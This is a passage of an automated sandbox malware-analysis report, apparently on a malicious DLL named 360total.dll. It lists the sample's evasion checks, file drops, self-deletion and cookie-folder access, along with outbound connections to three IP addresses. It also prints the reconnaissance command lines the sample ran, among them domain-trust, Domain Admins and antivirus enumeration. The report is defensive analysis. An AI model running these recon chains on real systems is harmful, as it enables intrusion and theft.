                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
                      Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: Slides.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Docs.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Google Drive.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: YouTube.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Sheets.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Gmail.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: C:\Windows\System32\rundll32.exe Automated click: OK
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 360total.dll.dll Static PE information: Image base 0x180000000 > 0x60000000
                      Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr
                      Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError
                      Source: Update_27361bf8.dll.4.dr Static PE information: real checksum: 0xd8785 should be: 0xe745c
                      Source: 360total.dll.dll Static PE information: real checksum: 0xd8785 should be: 0xe745c
                      Source: 360total.dll.dll Static PE information: section name: wsgi2
                      Source: Update_27361bf8.dll.4.dr Static PE information: section name: wsgi2
                      Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010451 push rcx; ret 3_2_0000000180010452
                      Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001045A push rcx; ret 3_2_000000018001045B
                      Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001801758FC push rsp; ret 3_2_00000001801758FD
                      Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180175CDE push 2027C70Fh; ret 3_2_0000000180175CE5

                      Persistence and Installation Behavior

                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll

                      Boot Survival

                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                      Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\rundll32.exe File deleted: c:\users\user\desktop\360total.dll.dll
                      Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\rundll32.exeCode function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection,3_2_00000001800655A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049AEC3_2_0000000180049AEC
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E76DC rdtsc 8_3_000001E3B57E76DC
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_00000237C16C68E8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,4_2_00000237C16C7FA8
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 545Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 668Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 8786Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dllJump to dropped file
                      Source: C:\Windows\System32\rundll32.exeAPI coverage: 0.1 %
                      Source: C:\Windows\System32\rundll32.exe TID: 2220Thread sleep count: 545 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 2220Thread sleep time: -545000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 2952Thread sleep count: 668 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 2952Thread sleep time: -66800s >= -30000sJump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 2220Thread sleep count: 8786 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 2220Thread sleep time: -8786000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16CA350 FindFirstFileW,FindNextFileW,LoadLibraryW,4_2_00000237C16CA350
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,4_2_00000237C16C1A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E16F4 FindFirstFileW,FindNextFileW,8_3_000001E3B57E16F4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E6604 FindFirstFileA,FindNextFileA,8_3_000001E3B57E6604
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57EAC90 GetSystemInfo,8_3_000001E3B57EAC90
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\Jump to behavior
                      Source: Amcache.hve.9.drBinary or memory string: VMware
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365701357.000001E3B36F9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096540598.000001E3B36F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000008.00000003.3366424299.000001E3B57B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: rundll32.exe, 00000004.00000002.2009327636.00000237C16F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rod_VMware_SATA_CD00
                      Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0000000180070760
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,3_2_0000000180066C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,3_2_00000001800033E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A7AC GetProcessHeap,3_2_000000018000A7AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000000018006F6E0

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.21.46.75 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.67.219.28 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.21.84.207 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180066A50 memset,GetModuleFileNameW,GetCommandLineW,memset,ShellExecuteExW,CloseHandle,3_2_0000000180066A50
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /allJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfoJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trustsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trustsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domainJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /allJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domainJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:ListJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net config workstationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installedJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c whoami /groupsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle,3_2_000000018004A650
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,3_2_0000000180049278
                      Source: Update_27361bf8.dll.4.drBinary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
                      Source: rundll32.exeBinary or memory string: Progman
                      Source: rundll32.exeBinary or memory string: Program manager
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006A304 GetSystemTimeAsFileTime,3_2_000000018006A304
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C8AE0 GetUserNameA,wsprintfA,4_2_00000237C16C8AE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5879708 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,8_3_000001E3B5879708
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,3_2_0000000180040CB0
                      Source: C:\Windows\System32\nltest.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601666880.000001ABBC4D1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602672974.000001ABBBDAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: WMIC.exe, 0000002E.00000002.3602844676.000000800E378000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ndows Defender\MsMpeng.exe
                      Source: WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000002.3603092587.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602735400.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Files%\Windows Defender\MsMpeng.exe
                      Source: rundll32.exeBinary or memory string: 360tray.exe
                      Source: rundll32.exeBinary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                      Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows Defender\MsMpeng.exe
                      Source: WMIC.exe, 0000002E.00000003.3602239295.000001ABBC4B1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602219141.000001ABBC4B0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602672974.000001ABBBDAE000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601495070.000001ABBBD86000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000002.3603064300.000001ABBBD89000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBD87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: rundll32.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                      Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 3.2.rundll32.exe.14614300000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.146142f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.146142f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.237c16b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.14614300000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.237c16c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.237c16c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
